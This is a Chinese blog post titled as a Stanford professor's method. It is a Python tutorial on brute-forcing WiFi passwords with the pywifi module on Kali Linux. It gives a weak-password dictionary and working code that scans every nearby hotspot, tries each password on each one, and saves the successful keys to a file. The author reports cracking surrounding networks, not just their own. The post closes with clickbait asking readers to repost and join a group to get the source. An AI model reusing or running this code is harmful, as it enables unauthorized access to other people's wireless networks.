您的位置:首页 > 编程语言 > Python开发

看斯坦福教授如何使用Python暴力破解WIFI密码!还怕没流量?

2018-11-09 16:40 417 查看

 

 

环境准备

  • python2.7
  • 凑合的linux
  • 差不多的无线网卡
  • pywifi模块
  • 弱口令字典
  • 清除系统中的任何wifi连接记录(非常重要!!!)

首先,这个模块在win下有点鸡肋,作者在调用WLANAPI时没有做好WLAN_SECURITY_ATTRIBUTES的封装,所以推荐在linux下跑,我测试所使用的是Kali 2.0 自带python 2.7.6 ,可直接通过 pip install pywifi 安装。

导入模块

这里用的模块就这三个 pywifi的_wifiutil_linux.py脚本的 _send_cmd_to_wpas方法中的if reply != b’OK ’:判断需要修改,不然会有很多的提示信息。

 

字典准备

效率很重要,毕竟这东西跑起来可真慢,下面是天朝用的比较多的wifi弱口令TOP10

  1. 12345678
  2. 123456789
  3. 88888888
  4. 1234567890
  5. 00000000
  6. 87654321
  7. 66668888
  8. 11223344
  9. 147258369
  10. 11111111

需要源码,关注,转发 私信“12”即可获取!

 

配置扫描器

推荐扫描时常可以设置在15-20秒之间 测试时常则可以自定义,考虑到认证速度于距离的关系,我一般设置在15左右,再久的也没意义 到时候就算破解成功的热点,信号也好不到哪里

def main():

#扫描时常

scantimes = 3

#单个密码测试延迟

testtimes = 15

output = sys.stdout

#结果文件保存路径

files = "TestRes.txt"

#字典列表

keys = open(sys.argv[1],"r").readlines()

print "|KEYS %s"%(len(keys))

#实例化一个pywifi对象

wifi = PyWiFi()

#选择定一个网卡并赋值于iface

iface = wifi.interfaces()[0]

#通过iface进行一个时常为scantimes的扫描并获取附近的热点基础配置

scanres = scans(iface,scantimes)

#统计附近被发现的热点数量

nums = len(scanres)

print "|SCAN GET %s"%(nums)

print "%s %-*s| %-*s| %-*s| %-*s | %-*s | %-*s %*s %s"%("-"*70,6,"WIFIID",18,"SSID OR BSSID",2,"N",4,"time",7,"signal",10,"KEYNUM",10,"KEY","="*70)

#将每一个热点信息逐一进行测试

for i,x in enumerate(scanres):

#测试完毕后,成功的结果讲存储到files中

res = test(nums-i,iface,x,keys,output,testtimes)

if res:

open(files,"a").write(res)

扫描周围热点

 

热点测试

这里后续推荐将扫描过程数据入库,防止重复扫描,且更加直观。

def test(i,face,x,key,stu,ts):

#显示对应网络名称,考虑到部分中文名啧显示bssid

showID = x.bssid if len(x.ssid)>len(x.bssid) else x.ssid

#迭代字典并进行爆破

for n,k in enumerate(key):

x.key = k.strip()

#移除所有热点配置

face.remove_all_network_profiles()

#讲封装好的目标尝试连接

face.connect(face.add_network_profile(x))

#初始化状态码,考虑到用0会发生些逻辑错误

code = 10

t1 = time.time()

#循环刷新状态,如果置为0则密码错误,如超时则进行下一个

while code!=0 :

time.sleep(0.1)

code = face.status()

now = time.time()-t1

if now>ts:

break

stu.write(" %-*s| %-*s| %s |%*.2fs| %-*s | %-*s %*s"%(6,i,18,showID,code,5,now,7,x.signal,10,len(key)-n,10,k.replace(" ","")))

stu.flush()

if code == 4:

face.disconnect()

return "%-*s| %s | %*s |%*s "%(20,x.ssid,x.bssid,3,x.signal,15,k)

return False

案例

这里显示本次测试使用了11个弱口令,并扫描到了20个热点,然后开始坑爹的跑起来了

  • WIFIID 热点的id号 每跑一个会减1
  • SSID OR BSSID 热点的ssid名或mac地址
  • N 对热点的连接状态,这个在
  • time 当前所花去的时间
  • signal 热点的信号强度,若小越好
  • KEYNUM 测试密码的id 每跑一个会减1
  • KEY 当前测试的密码

 

结果还不错,各位的安全意识不像以前那么蛋疼了,扫出一两个,其中一个还是自家的 – –

关注,转发,进群:813542856即可获取源码和我精心准备的Python学习资料一份,先到先得,只限前100名!

 

阅读更多
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: